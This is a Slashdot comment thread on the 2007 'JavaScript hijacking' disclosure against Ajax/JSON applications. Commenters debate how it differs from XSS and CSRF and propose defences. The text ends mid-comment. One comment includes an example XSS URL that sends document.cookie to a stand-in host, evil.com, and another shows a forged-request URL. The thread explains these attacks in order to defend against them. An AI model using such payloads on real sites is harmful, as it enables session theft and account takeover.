×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Web 2.0 Under Siege

Hemos posted about 7 years ago | from the in-dark-territory dept.

Security 170

Robert writes "Security researchers have found what they say is an entirely new kind of web-based attack, and it only targets the Ajax applications so beloved of the 'Web 2.0' movement. Fortify Software, which said it discovered the new class of vulnerability and has named it 'JavaScript hijacking', said that almost all the major Ajax toolkits have been found vulnerable. 'JavaScript Hijacking allows an unauthorized attacker to read sensitive data from a vulnerable application using a technique similar to the one commonly used to create mashups'"

cancel ×
This is a preview of your comment

No Comment Title Entered

Anonymous Coward 1 minute ago

No Comment Entered

170 comments

XSS (2, Interesting)

Anonymous Coward | about 7 years ago | (#18574321)

So, how is this different than Javascript injection or Cross-site Scripting?

Re:XSS (5, Informative)

KDan (90353) | about 7 years ago | (#18574367)

I think the very subtle difference is that this time the calls are made using site A's public Ajax API, using site A's authentication token, but are made from a script sitting on site B. The javascript calls return with data from site A, which can then be handled by site B. XSS/JS Injection is more about injecting alien javascript onto site A to make site A call site B with the info it wants.

Daniel

Re:XSS (1, Interesting)

Anonymous Coward | about 7 years ago | (#18574507)

Regarding regular XSS...

XSS/JS Injection is more about injecting alien javascript onto site A ...

OK so far.

... to make site A call site B with the info it wants.

Darn, I thought it was to make site A execute code/retrieve infos from the user's system, not from another site :(

Would you care to develop a little bit?

Re:XSS (4, Informative)

KDan (90353) | about 7 years ago | (#18574817)

Sorry, I was writing this in a rush. I meant site A executes the code that was injected, retrieves the resulting data from site A, and then sends that data over to site B (or some other location). Typically this "data" is stuff like login information...

Daniel

Re:XSS (1)

jimbojw (1010949) | about 7 years ago | (#18575987)

The article makes reference to Fortify Software having "said" that they found this vulnerability. Does anyone have a link to their actual announcement?

Re:XSS (2, Funny)

Bogtha (906264) | about 7 years ago | (#18576475)

Here [fortifysoftware.com] . For future reference:

  1. Throw the words "Fortify Software" at Google.
  2. Click on the first link.
  3. Click on the prominent link in the middle of their home page.

It's really not that hard to find details. All you really need is the ability to operate a web browser, a search engine, and about thirty seconds of your time.

Re:XSS (1)

Rastafario (1083239) | about 7 years ago | (#18576757)

I don't see this vulnerability being any different than your average Phishing scam. The only difference is the fact that the entire attack can happen without user's interaction. A visit to a malicious site is enough.
I feel that the primary responsibility still sits with the user of the web application, browsing only trusted sites is the only way you can protect yourself.
It would be nice for an AJAX developer to ensure that the users of his/her application are not vulnerable to these kind of attacks, but until the browser community secures the use of frames and iframes (which I believe are the biggest culprits here), there is not much a developers can do.
A simple rule for the browser to follow here would be:
A secure page loaded from a URL address can only rely on resources loaded from the same address. period.

Re:XSS (3, Informative)

Cigarra (652458) | about 7 years ago | (#18574417)

So, how is this different than Javascript injection or Cross-site Scripting?
It is not. They just HAD to make it to Slashdot's front page.

Re:XSS (2, Informative)

Anonymous Coward | about 7 years ago | (#18574647)

This attack seems to be more like CSRF than XSS. You have authenticated to site A, you have a cookie to site A, you navigate to site B. In CSRF, site B performs a hidden form post to update and change information on your account. In this attack, site B performs cross site AJAX calls to steal, update, or change information on your account.

--Anonymous Coward

Vocabulary Fix (3, Funny)

Nerdfest (867930) | about 7 years ago | (#18574323)

Sadly, this is likely to do very little to stop the use of the word 'mashups'.

Re:Vocabulary Fix (0, Offtopic)

omeomi (675045) | about 7 years ago | (#18574453)

The only use of the term Mashup that I'm familiar with is the music-oriented one [wikipedia.org] ...I guess the "web 2.0" crowd needed another catchy buzzword. Hooray.

Re:Vocabulary Fix (1)

Seumas (6865) | about 7 years ago | (#18574455)

Or web 2.0.
Or AJAX.

Really, let it be the death of both. Too bad it's a couple years too late.

Re:Vocabulary Fix (3, Funny)

MikeFats (1024245) | about 7 years ago | (#18575405)

You're right - who doesn't yearn for the good old Pine and Gopher days? I spit on you AJAX and Web 2.0.

Okay, I'll be the first to ask. (5, Insightful)

Z0mb1eman (629653) | about 7 years ago | (#18574329)

How is this different from cross-site scripting?

"In an example attack, a victim who has already authenticated themselves to an Ajax application, and has the login cookie in their browser, is persuaded to visit the attacker's web site. This web site contains JavaScript code that makes calls to the Ajax app. Data received from the app is sent to the attacker."

Re:Okay, I'll be the first to ask. (5, Informative)

daviddennis (10926) | about 7 years ago | (#18574511)

This is much harder to protect against than normal XSS. Why? Because the Ajax does not have to be executed from within the same domain.

Let's say someone wants to attack my site, amazing.com. I browse to their site, remarkable.com, and the exploit code gets loaded into my browser. Remarkable.com can post to amazing.com using AJAX and receive replies as though they were authenticated on my site, because the browser automatically sends the amazing.com cookies with it when accessing an amazing.com URL. It appears to the browser fundamentally as though I was in remarkable.com and then typed the amazing.com URL on to the address bar.

(Of course you could spoof the referer but not from an existing browser session so I think the referer can be relied on in this context.)

If this is so, then it could truly be a throbbing migraine to fix - you would have to use the HTTP referer field to verify that the site calling your Ajax code was valid.

Hope that helps. Not the cheeriest news this morning :-(, but hopefully Prototype will have some kind of fix, and life will go on.

D

Re:Okay, I'll be the first to ask. (4, Informative)

Bogtha (906264) | about 7 years ago | (#18574657)

No, that kind of thing has always been possible since the very first implementation of JavaScript. If you don't need POST, then you can even do it with plain HTML 2.0, no JavaScript.

The problem here is that JSON is a subset of JavaScript and so it is automatically parsed under the local domain's security context when it's included in a document with <script>. There's a few tricks to "hide" it even though it's already been parsed and is sitting in memory, I assume these guys have found a way around that.

Re:Okay, I'll be the first to ask. (0)

uss_valiant (760602) | about 7 years ago | (#18575659)

This is no news and your next best AJAX implementation is only affected if they deliberately allow cross-domain calls.

As far as I understand this article - and it's very short on details - this only affects AJAX APIs / apps that are designed to be called from other domains.
Usually, an AJAX reply just contains data (XML, JSON, or in another format). But if the reply is actually valid JS, e.g. a callback function, you can include it via the script tag and call the returned callback function to read the cross-domain JS reply in JS and do something with it.
See here [simonwillison.net] or here [thefutureoftheweb.com] .

Bottom line: Don't expose any data / functionality through an API that allows cross-domain XHR unless you add additional precautions.

Re:Okay, I'll be the first to ask. (4, Informative)

Bogtha (906264) | about 7 years ago | (#18575861)

this only affects AJAX APIs / apps that are designed to be called from other domains.

No, that's the vulnerability. This allows other domains to get the data when the applications don't want to share it.

Bottom line: Don't expose any data / functionality through an API that allows cross-domain XHR unless you add additional precautions.

The news here is that the "additional precautions" that most Ajax libraries take are ineffective.

Re:Okay, I'll be the first to ask. (1)

uss_valiant (760602) | about 7 years ago | (#18575985)

this only affects AJAX APIs / apps that are designed to be called from other domains.

No, that's the vulnerability. This allows other domains to get the data when the applications don't want to share it.

Bottom line: Don't expose any data / functionality through an API that allows cross-domain XHR unless you add additional precautions.

The news here is that the "additional precautions" that most Ajax libraries take are ineffective.

Where did you read this in the article? The article has no details. Or do you have another source?

Re:Okay, I'll be the first to ask. (1)

Bogtha (906264) | about 7 years ago | (#18576255)

Where did you read this in the article? The article has no details.

Are we reading the same article [cbronline.com] ? It lists vulnerable Ajax libraries. It uses GMail and webmail in general as examples of potentially vulnerable web applications. GMail and typical webmail applications aren't designed to be called from other domains in mashups.

Or do you have another source?

Here's the advisory [fortifysoftware.com] (PDF). They override the Object() constructor before calling the JSON so they can capture the data without worrying about scope.

Re:Okay, I'll be the first to ask. (1)

MagicM (85041) | about 7 years ago | (#18576045)

+1 Insightful

If your AJAX implementation simply returns JSON data ({json}), there is nothing to worry about. However, if something like "parseData({json})" or "data={json}" is returned (either naively, or on purpose to support cross-domain calls), then you are vulnerable.

Makes me wonder what exactly these vulnerable AJAX toolkits are doing, and why.

Re:Okay, I'll be the first to ask. (1)

Bogtha (906264) | about 7 years ago | (#18576371)

If your AJAX implementation simply returns JSON data ({json}), there is nothing to worry about.

This isn't true. The example they use is overriding the Object() constructor. Keeping the JSON out of scope doesn't save you.

Re:Okay, I'll be the first to ask. (1)

MagicM (85041) | about 7 years ago | (#18576603)

Who is "they", and where do they use that example?

(Not questioning what you said, I just want to learn more.)

Re:Okay, I'll be the first to ask. (1)

MagicM (85041) | about 7 years ago | (#18576855)

Never mind. I noticed the other comment you posted in which you provide the URL. Thanks!

I beg to differ (-1, Flamebait)

Anonymous Coward | about 7 years ago | (#18574821)

Don't use AJAX. Problem solved. Your site NEEDS javascript? Why? To deliver advertising? For cute little mouseover animations? I probably would HATE your crappy site!

As number two said to number six, "Information! We want information! And by hook or by crook, we'll get it."

And if your pathetic round-edged blinkey twirley site won't work without javascript, we'll go elsewhere. I used to visit weather.com almost daily, but since they added their "interactive" maps that won't work in Firefox on Linux, I just go to one of the thousands of other places on the net to get a forecast, see the temperature, and view radar.

If you make the web insecure for me, if you make the web unuseable for me, I'm stupid for visiting your site. And not all of us are stupid.

Please consider your use of AJAX. Please use javascript and Flash only where absolutely necessary - and even then, triple check to make sure it's ABSOLUTELY necessary. Stop fucking up the internet for me!

Re:Okay, I'll be the first to ask. (2, Interesting)

consumer (9588) | about 7 years ago | (#18575775)

Checking the referer header is ultimately going to fail because it would mean trusting the client to not lie about the referer. There are some better techniques described in the Wikipedia XSRF entry.

Re:Okay, I'll be the first to ask. (2, Informative)

Anonymous Coward | about 7 years ago | (#18574535)

My thought exactly. More specifically, this sounds like a CSRF attack ( http://en.wikipedia.org/wiki/Cross-site_request_fo rgery [wikipedia.org] ).

Such an attack previously succeeded on Digg (in the form of a white-hat demonstration of a self-Digging website), but that vulnerability has already been patched. The description of the demo attack, which they also refer to as "session riding," is available here: http://4diggers.blogspot.com/ [blogspot.com]

Re:Okay, I'll be the first to ask. (1)

joshua (2507) | about 7 years ago | (#18575541)

I agree, I can't see what the difference is between this and CSRF.

Re:Okay, I'll be the first to ask. (2, Insightful)

michaelmalak (91262) | about 7 years ago | (#18574573)

Cross-site scripting allows a web page browsed by a socially engineered victim to be transmitted to the culprit. JavaScript hijacking is more powerful -- it allows arbitrary data stored on a server (e.g. an entire address book or even all of a user's e-mail on a webmail system) to be transmitted to the culprit.

Re:Okay, I'll be the first to ask. (1)

kestasjk (933987) | about 7 years ago | (#18575093)

XSS is a vague term, but lots of people would put "JavaScript hijacking" under the same umbrella as XSS. Your typical XSS attack involves injecting JavaScript into the target domain (this may involve social engineering the victim into going to a url which will inject the JavaScript, eg http://friendly.com/?var=image.src='http://evil.co m/'+document.cookie [friendly.com] ).

If you can inject the JavaScript needed to do this you can usually also get it to read webmail etc. I won't repeat the things given by others that distinguish the attack posted in TFA from a regular XSS attack.

Re:Okay, I'll be the first to ask. (1)

sottovoce (139898) | about 7 years ago | (#18575965)

This exploit is different from XSS and is not new. It's called CSRF, Cross-Site Request Forgery. Web developers have known about it for several years. It's tricky to understand and potentially very dangerous, but there are remedies.

Because the problem and remedies are somewhat abstruse, casual or uninformed developers don't always take it into consideration. I'm actually a little surprised that the vast majority of commentators here seem to be unaware of it.

References:
http://getahead.org/blog/joe/2007/01/01/csrf_attac ks_or_how_to_avoid_exposing_your_gmail_contacts.ht ml [getahead.org]
http://en.wikipedia.org/wiki/Cross-site_request_fo rgery [wikipedia.org]
http://www.tux.org/~peterw/csrf.txt [tux.org] (from 2001!)

YES (-1, Troll)

Anonymous Coward | about 7 years ago | (#18574359)

The moar you know!

Everything's fine as long as we're all edumacated.

XSRF (2, Interesting)

Anonymous Coward | about 7 years ago | (#18574391)

How is this different than Cross Site Response Forgery?

http://en.wikipedia.org/wiki/Cross-site_request_fo rgery [wikipedia.org]

Re:XSRF (0)

Anonymous Coward | about 7 years ago | (#18574581)

+1
Sounds like XSRF. Of course you need to include auth tokens (active auth + cookie) in your AJAX requests.
Just because the request is sent to an AJAX handler doesn't mean you can drop XSRF protection used for other change requests.

Re:XSRF (1)

Qzukk (229616) | about 7 years ago | (#18574725)

It seems like the difference between this and XSRF is that this actually uses the results returned from the site, while "standard" XSRF was just hitting www.myspace.com/friend.php?addfriend=imlonely in an img tag or somewhere. ... in other words, it's just as new as "... on the internet!"

Re:XSRF (0)

Anonymous Coward | about 7 years ago | (#18574901)

The article is lacking details or a clear technical description.
We can theorize all day long, but fact is, there is no proof of concept and today's assumption is that xmlhttprequest can't be used to send requests to other domains.

I don't worry until I see a proof of concept or a more detailed description.

quick! (5, Funny)

mastershake_phd (1050150) | about 7 years ago | (#18574407)

Upgrade to Web 3.0, quick!

Re:quick! (0)

Anonymous Coward | about 7 years ago | (#18575115)

Microsoft already patented that. Unless you're using Windows Server 2003 or Novell SUSE you're fucked.

That's exactly what they should do (1)

Colin Smith (2679) | about 7 years ago | (#18576365)

With ajax, you're essentially opening up the guts of your application to the world, both the server and client side are wide open to exploitation, neither side can trust the other. It's a security nightmare, far more difficult to secure than your regular client/server application.
 

Hunt them down and kill them (0, Flamebait)

sycodon (149926) | about 7 years ago | (#18574423)

...every last punkwad that attacks someone's computer systems for fun or profit.

Re:Hunt them down and kill them (-1, Flamebait)

sycodon (149926) | about 7 years ago | (#18574495)

I guess the moderator is a punkwad who enjoys breaking into people's computers.

no (0)

Anonymous Coward | about 7 years ago | (#18576601)

moderators like to fuck goats.. trust me on this one

Duh (3, Informative)

evil_Tak (964978) | about 7 years ago | (#18574465)

This has been around for (web) ages. As stated in the summary, it's used all over the place to create mashups because it's one of the only ways around the security requirement that XmlHttpRequest can only talk to the originating server.

Adobe and MS should be happy about this (-1, Flamebait)

parvenu74 (310712) | about 7 years ago | (#18574469)

Or anyone else who would have a vested interest in seeing "Web 2.0" technology fail in order that they might sell us things like Flash developer platforms or WPF(/e) to solve our Web 2.0 woes.

Mashups? (5, Funny)

Rob T Firefly (844560) | about 7 years ago | (#18574509)

'JavaScript Hijacking allows an unauthorized attacker to read sensitive data from a vulnerable application using a technique similar to the one commonly used to create mashups'
So back when I made the Beastie Boys rap over the Macarena tune, [spacemutiny.com] I was really hacking the Web 2.0? And here I thought I was just assaulting eardrums and good taste...

Where's the problem? (5, Interesting)

pimterry (970628) | about 7 years ago | (#18574557)

"In an example attack, a victim who has already authenticated themselves to an Ajax application, and has the login cookie in their browser, is persuaded to visit the attacker's web site. This web site contains JavaScript code that makes calls to the Ajax app. Data received from the app is sent to the attacker."

So essentially it means that the attacker can use the authentication cookie of the user to authenticate them again, and then run javascript with that authentication. But why are AJAX apps storing authentication in cookies? If you need to store authentication (User session id's etc), store them in a variable within the javascript. That'll stay there until a page refresh clears variable status, and how many page refreshes occur with AJAX?

AJAX apps do not need to (and should not!) store user authentication in cookies. Cookies are useful for keeping a continual session open between pages. AJAX needs no continual session. If they don't use cookies, then other sites cannot use that authentication.

Where's the problem? (What am i missing?)

PimTerry

Re:Where's the problem? (3, Informative)

TheSunborn (68004) | about 7 years ago | (#18574683)

The problem is your statement that "AJAX needs no continual session"

AJAX really do need sessions. Just think of Gmail. It it a single AJAX session starting when you login, and finishing when you logout or timeout.

If AJAX don't use sessions, it would have to authenticate itself with username and password with each request it made to the server.

An better solution might be to let the AJAX application explicit handle sessions by storing the session id, and sending it in the post part of all it's requests. But that might be a problem with the browsers history, because it would then loose your session id, if you used the back button.

Re:Where's the problem? (1)

daeg (828071) | about 7 years ago | (#18574819)

Why would it need to reauthenticate with each AJAX request? You can easily just append the session token to the end of your POST (or GET) requests. It goes over the wire in cleartext anyway. All AJAX apps should be using SSL anyway.

You don't run into this specific problem if you do that. New windows with the same domain name (e.g., gmail.com) don't share the same memory as the original window, thus it won't have the authentication token, and won't have the active cookie, either.

Re:Where's the problem? (0)

Anonymous Coward | about 7 years ago | (#18576713)

> You can easily just append the session token to the end of your POST (or GET) requests.

Appending the session ID to URLs you return opens you up to the simplest XSS attack of all: any link to the exploiter will hands the session ID to the attacker. It doesn't even need to be a page.

Storing it in a variable is all right, but people do hit the refresh button, so you have to give it a way to re-authenticate without requiring a new login.

Re:Where's the problem? (1)

pimterry (970628) | about 7 years ago | (#18574907)

"An better solution might be to let the AJAX application explicit handle sessions by storing the session id, and sending it in the post part of all it's requests."

That's what I meant :).

All cookies are are files with text in that identifies you session. Since the JS checks the cookies not the server, any request must include data to validate the session anyways. Think about it, you go to a page it generates a cookies with you session auth data in it. The javascript then requests appointment data for user X. The javascript MUST be including some sort of validation data, or otherwise the server will just be giving out this data to anybody who requests it, and assuming the javascript has checked the cookie. AJAX can just store it in the javascript, rather than reading it from the cookie every request. It's the same stored session data (or it can be), its just stored in a javascript variable rather than a cookie.

I can prove it :D. Install the Firebug extension https://addons.mozilla.org/en-US/firefox/addon/184 3 [mozilla.org] into firefox and click console. It shows AJAX requests including parameters. All of them have a session identifier of some sort. For example I just tried Gmail, you get a 16 character SID (session id presumably) paramater send with every request.

In summary, hell is in the cookies.

Re:Where's the problem? (2, Informative)

ergo98 (9391) | about 7 years ago | (#18574871)

But why are AJAX apps storing authentication in cookies? If you need to store authentication (User session id's etc), store them in a variable within the javascript.

Store then in javascript? Huh?

It is completely normal -- across the entire industry -- to store session identifiers in cookies. There is nothing special or AJAXy about that.

Re:Where's the problem? (1)

pimterry (970628) | about 7 years ago | (#18574969)

var SessionID = "asdaszxc2130123ashsad";

Stored.

sendRequest("type='appointmentList'&SID="+SessionI D);

Requested (+ auth)

Cookies complicate this. You only need them to keep data when moving between pages. But you're not moving between pages!

It's like storing stuff on HDD so it's still there next boot, vs saving to RAM. Sort of.

PimTerry.

Shirky's Law: (4, Interesting)

sakusha (441986) | about 7 years ago | (#18574613)

"Social Software is stuff that gets spammed."

The obvious implication of Shirky's Law is that Web 2.0 services are an attractive nuisance and give spammers and other griefers an incentive to game the system. Any new web service has to account for this and build in extremely high levels of security. Obviously nobody is doing this.

Is that title sarcastic? (3, Insightful)

jeevesbond (1066726) | about 7 years ago | (#18574651)

I really hope it is. There's no such thing as Web 2.0, some arse decided to put a label on the natural progression the Web was undertaking anyway. It's annoying when authors write that some entirely new, completely re-written version of the Web is--suprisingly--vulnerable, it's the same old Web, just with some new buzz-words.

This is a vulnerability that appears only when passing Javascript between client and server. An attacker has to get a potential-victim who is logged-in to a site, that uses the JSON format to exchange data using AJAX, to visit a page they've setup. Then the attacker can intercept the data as it travels between client and server, a man in the middle attack. From the article:

In an example attack, a victim who has already authenticated themselves to an Ajax application, and has the login cookie in their browser, is persuaded to visit the attacker's web site. This web site contains JavaScript code that makes calls to the Ajax app. Data received from the app is sent to the attacker.

So it's a known method of attack, but because it's aimed at web sites using AJAX it has to be labelled 'Web 2.0'. Ugh.

We've already seen this before (4, Interesting)

slashkitty (21637) | about 7 years ago | (#18574661)

It was reported as a problem with the google address book. These guys just generalized the problem because they saw it in many places.

It actually could be pretty nasty. I think the only solution is for you to pass authenticated tokens through the url or input parameters (not through cookies).

It might be a good time to use the firefox NoScript plugin if you're not using it already. Only allow javascript on sites you trust.

They discovered this? (1, Informative)

borkus (179118) | about 7 years ago | (#18574677)

I went to an Ajax conference last fall and I'm pretty sure that presenters mentioned this vulnerability in JSON.

All AJAX applications transfer data between the webpage in the client's browser and the server. If the data is in XML, the webpage and the XML have to come from the same server. If it's JSON (JavaScript Object Notation), then they do not have to come from the same server. So, if you are sending data that depends on some kind of authentication - don't use JSON.

The JSON vulnerability comes from having your session open too long. Someone navigates to a bad site and it access the active session on the target site. Shorter session timeouts help with this. You can also do some authentication in the XML request as well. And don't use JSON for data that requires authentication.

In short, if you're using AJAX for data that requires authentication, then you need to take some simple precautions.

Re:They discovered this? (1, Insightful)

Anonymous Coward | about 7 years ago | (#18574865)

What an insightful analysis, not in the least bit impeded by being so blatantly wrong. JSON is a format.

Re:They discovered this? (1, Informative)

Anonymous Coward | about 7 years ago | (#18575555)

All AJAX applications transfer data between the webpage in the client's browser and the server. If the data is in XML, the webpage and the XML have to come from the same server. If it's JSON (JavaScript Object Notation), then they do not have to come from the same server. So, if you are sending data that depends on some kind of authentication - don't use JSON.
Uhh pardon? If I return json or I return XML, or I return pain text, or I return some format of my choice, the server requesting the script will still get the result from my server, just as if you POST'ed to a form on my site. This is the same issue as a cross site request forgery, the evil domain you are visiting is relying on the request to be validated since the cookies are set on the clients machine. All they are saying is that data returned from a ajax-script can be viewed using the same CSRF attack methods, this is NOTHING NEW. If the script requires request tokens (anything that would return sensitive information, or modify user accounts etc.), DON'T store them in cookies, or you are just as vulnerable to a "standard" CSRF attack, generate the tokens for the page and pass them in post/get.

Re:They discovered this? (2, Funny)

borkus (179118) | about 7 years ago | (#18575817)

I return pain text
I so want to return pain text to certain users.

if text_body == ALL_CAPS
        return PAIN_TEXT

Re:They discovered this? (1)

beppu (32422) | about 7 years ago | (#18575777)

Please mod the parent down, because it is incorrect as the Anonymous ones have stated.

Re:They discovered this? (1)

borkus (179118) | about 7 years ago | (#18575883)

What because you can cross-site script XML? Enlighten me.

Re:They discovered this? (1)

julesh (229690) | about 7 years ago | (#18576153)

Even if the script produces an XML result, you can still make the request using the same technique. Thus, if you have a single step method for making some potentially dangerous transaction, that transaction can be performed by an attacker. What they can't do is extract meaningful data from the result.

All of these vulnerabilities show in my mind that the cookie model is fundamentally flawed. Cookies should not be associated with the domain of the server that set them, but the pair (, ). This would also incidentally stop cross-site "browser habit" tracking being performed by people who drop an ad banner on a page.

Easy Fix (2, Funny)

Anonymous Coward | about 7 years ago | (#18574695)

Just serve up an animated cursor before any XML handshakes. This will stop the attackers from exploiting the AJAX piece.

Enough (0, Redundant)

Luscious868 (679143) | about 7 years ago | (#18574941)

"Web 2.0" is a buzzword used by those in the media who do not have a background in and/or an understanding of technology. Discuss ....

Re:Enough (3, Informative)

Anonymous Coward | about 7 years ago | (#18575367)

BBZZZT! I'll bite... "Web 2.0" is a term coined by Tim O'Reilly (of O'Reilly Media; you know, those books with the animals on the cover) as a way of classifying a new generation of web-based applications, a shift from static text and html to interactivity and user-participation in creating the content of a site. The media picked up on it later and gave it buzzwordyness. People who do not have a background in and/or an understanding of technology assume that the media made it up.

enough semantics! (1)

chdig (1050302) | about 7 years ago | (#18575635)

Wrong. It's a buzzword used by the media to represent interactive web applications, whether they understand technology or not. It's useful because it's painfully simple, and non-techie people get the basic idea.

Given that the article was not aimed directly at web developers, but at people interested in computing in general, it's appropriate for them to use buzzwords to convey their message.

If I'm talking with another web developer, I'll get upset if he/she uses "web 2.0" in a sentence -- when it comes to my profession, I hate the word. When dealing with non-web tech savvy people, it's a helpful tool to refer to dynamic websites of the type that may have this vulnerability.

Very few news articles are ever written for the /. audience, so don't take it personally when they disregard us. And don't get upset at them for using certain words when they weren't talking to us in the first place. We may make a lot of things work, but the world doesn't revolve around ./!

Re:Enough (1)

illegalcortex (1007791) | about 7 years ago | (#18576185)

You should get the stick out of your ass. Discuss... ;)
Seriously, when they said Web 2.0, I knew what they were talking about (it's the "Under Seige" part that I felt was dumb). I knew they were talking about javascript and XMLHttpRequest stuff that is frequently called AJAX (another term which some people whine about). Do you even know what a buzzword is? It's something you add to a product because it's popular. Like "object oriented" or "xml" when it's irrelevant to the actual functioning of the product. On the other hand Web 2.0/AJAX defines web applications that function in quite a different manner than non Web 2.0/AJAX ones.

Re:Enough (1)

aaronoaxaca (1082897) | about 7 years ago | (#18576361)

A buzzword that well goes over very well with prospective clients these days, especially since you can tailor your definition to your clients desires due to the lack of an "official" description of the technology web 2.0 embraces and the new use models it allows.

Re:Enough (1)

julesh (229690) | about 7 years ago | (#18576427)

Ignorant media people and unscrupulous "consultants".

My company lost a client last year, because we were realistic with telling him what we could achieve over his web site. Meanwhile a "Web 2.0 consultant" told him that using the power of Web 2.0 he could keep my client's web site in the top google spot for search terms of his choice. My client was gullible enough to believe him.

What vulnerability? (-1, Troll)

Anonymous Coward | about 7 years ago | (#18574985)

Thank god "AJAX coders" don't do C, or we would be in a deeper shit. They should be shot in the balls.

Blah

Leaves web to trusted sites only (1)

failedlogic (627314) | about 7 years ago | (#18575023)

I think the article is a bit exaggerated but if the idea that "Web 2.0" is under attack might be a good time to look at this problem. Consider that a lot of people only surf a few websites (get some news, etc) and use e-mail. Most people don't use the net for anything more.

So if I only visit about 10 websties daily and those 10 sites I'm reasonably sure are safe why would I go anywhere else if it could cause problems to my computer? I've seen and heard from a lot of people fed-up with spyware, adware and viruses. Its a waster of their time. So going to these other sites, simply because they could be infected would also be a waste of their time (assume they're interested in the content). If this blows up any more - or alternately - if the perception exists that the Internet will only get worse, its not going to help people go much past those 10 websites regularly.

Suprised? (1)

boxxa (925862) | about 7 years ago | (#18575113)

Is anyone actually suprised by this? It was only a matter of time since most people are using all the frameworks out there and more than half of the AJAX sites that spawned up arent fully protected by smart coding since its a new technology.

Backwards quote... (1)

xxxJonBoyxxx (565205) | about 7 years ago | (#18575135)

From TFA..

Everybody thought that the rise of Ajax as a web programming model would merely exacerbate existing types of attack. Few thought it would give rise to a new class, noted (some random guy).


Actually, I'd claim "everybody" with a toe in the security world thought it was the opposite; we'd start hearing about daily/weekly Ajax security problems as a regular course of business.

(If you think various operating systems have legacy code problems; you don't know "Javascript as implemented by browsers"...)

The Biggest WTF... (5, Funny)

Sam Legend (987900) | about 7 years ago | (#18575173)

The biggest WTF is that somebody is still using javascript. Oops. Wrong site...
(Captcha: backtotheweb1.0)

Detailed report on this problem (no reg required) (3, Informative)

robby_r (1082023) | about 7 years ago | (#18575207)

All: I encourage all of you to read the detailed report Fortify wrote on this topic. Its written for developers and explains the problem in clear technical detail. http://www.fortifysoftware.com/advisory.jsp [fortifysoftware.com] (No registration required) Its a long document but I doubt you'll have a lot of questions after reading it. Its refreshing to see reports written like this that don't insult a developer's intelligence.

sigh (4, Insightful)

CrazyBrett (233858) | about 7 years ago | (#18575309)

This just sounds like a fancy Cross-Site Request Forgery.

I still maintain that the collective blindness to these security issues comes from our absolute refusal to see HTTP requests as function calls. This is partly due to the silly ideology of the REST crowd.

Rephrase the situation as follows and see if this doesn't make you pee your pants: "Any site can instruct your browser to execute an arbitrary function on another site using your authentication credentials."

Re:sigh (3, Interesting)

julesh (229690) | about 7 years ago | (#18576547)

This just sounds like a fancy Cross-Site Request Forgery.

That'll be because it is. It's basically an observation that CSRF on a site which returns data in JSON format allows the attacker to read the content of the result. Well, duh. Of course that happens. It's one of the reasons I've always opposed JSON as a useful format.

The other reason is equally bad, but only applies to "mash up" type situations: the coder of the client has to trust the server with access to all data in the client. This makes it useless in many situations.

The best solution would be to scrap the current security system, make subrequest cookies (including XMLHttpRequests) dependent on both the domain the request goes to *and* the domain of the page that caused the request, and allow XMLHttpRequest to access servers other than the page source. This would both fix CSRF and eliminate the need for JSON. What more do you want? :)

vulnerable == cookie && json && !p (3, Informative)

Anonymous Coward | about 7 years ago | (#18575393)

An application may be vulnerable if:

- It uses cookies to store session IDs or other forms of credentials; and
- It sends data from server to browser using "JSON" notation; and
- It doesn't require POST data in each request.

A vulnerable application can be fixed by changing any of these three aspects:

- Stop using cookies, and instead supply the credentials in the request's URL or POST data.
- Don't use JSON, or munge your JSON so that it can't be run directly from within a <script> tag; for example, you could put comments around it in the server and strip them off in your client.
- Have the client send some POST data and check for it on the server (a <script> tag can't send POST data).

My preference, and the strategy that I've used in Anyterm and Decimail Webmail, is to not use cookies. To me it actually seems easier to put the session ID in the request, rather than to mess around with cookies.

The advisory, which explains it all but is a bit waffly at the start, is at http://www.fortifysoftware.com/servlet/downloads/p ublic/JavaScript_Hijacking.pdf [fortifysoftware.com]

On the upside... (1)

athloi (1075845) | about 7 years ago | (#18575417)

MySpace 2.0 is then, by extension, doomed. Watch CNN for exciting stories of the kiddie Internet wild west, where sexual predators and teenage hackers battle over rocky terrain useless to anyone with anything of import on their minds.

i told that EVERY time AJAX - 2.0 hype was posted (3, Interesting)

unity100 (970058) | about 7 years ago | (#18575467)

If you delegate operations and processes to client side, sooner or later they will be finding more ways to exploit it to an extent that it would be a security risk to offer such client side stuff, making anti-virus, anti-spyware, privacy product manufacturers more agitated about it, and in the end drawing visitors away from your site due to blocks, issues, and fear.

XML is so last week. What's really wrong. (5, Informative)

Animats (122034) | about 7 years ago | (#18575577)

XML is now so last week. Really l33t web apps use JSON, which is yet another way to write S-expressions like those of LISP, but now in Javascript brackets.

There are several security problems with JSON. First, some web apps parse JSON notation by feeding it into JavaScript's "eval" [json.org] . Now that was dumb. Some JSON support code "filters" the incoming data before the EVAL, but the most popular implementation missed filtering something and left a hole. Second, there's an attack similar to the ones involving redefining XMLHttpRequest: redefining the Array constructor. [getahead.org] (Caution, page contains proof of concept exploit.)

The real problem is JavaScript's excessive dynamism. Because you can redefine objects in one script and have that affect another script from a different source, the language is fundamentally vulnerable. It's not clear how to allow "mashups" and prevent this. The last attempt to fix this problem involved adding restrictions to XMLHttpRequest, but that only plugged some of the holes.

As a minimum, it's probably desirable to insist in the browser that, on secure pages, all Javascript and data must come from the main page of the domain. No "mashups" with secure pages.

half troll, half tart (1)

rodentia (102779) | about 7 years ago | (#18576173)

I'll ignore the debunked *XML is S-expressions* bait for the chance to second your critique of JavaScript and the inherent problems with the AJ part of AJAX.

Re:XML is so last week. What's really wrong. (3, Interesting)

julesh (229690) | about 7 years ago | (#18576797)

There are several security problems with JSON. First, some web apps parse JSON notation by feeding it into JavaScript's "eval". Now that was dumb.

You don't say. My first thought on hearing about the entire idea was "why would you want to let a foreign server run its code on your page?"

The real problem is JavaScript's excessive dynamism. Because you can redefine objects in one script and have that affect another script from a different source, the language is fundamentally vulnerable.

Err... if I don't let foreign code execute (e.g. by doing 'var e = document.createElement("script"); e.src = "http://www.someotherserver.com/potential-security -risk"; document.body.appendChild (e);', which I've seen many scripts do) how can another site redefine the objects in my script? I think the vulnerability is that most JS programmers are too willing to let other sites execute arbitrary code in their own context, which really ain't good.

The last attempt to fix this problem involved adding restrictions to XMLHttpRequest, but that only plugged some of the holes.

The fix seems obvious to me:

